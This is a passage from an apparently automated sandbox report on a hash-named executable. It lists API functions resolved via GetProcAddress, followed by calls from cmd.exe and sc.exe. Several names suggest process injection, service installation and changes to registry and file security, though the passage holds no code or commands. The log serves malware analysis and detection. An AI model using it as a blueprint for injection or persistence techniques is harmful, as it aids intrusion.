VirtualAllocEx (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002632)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003100)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00003100)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00003100)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00003100)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003100)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004684)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004684)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002932)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002932)\n 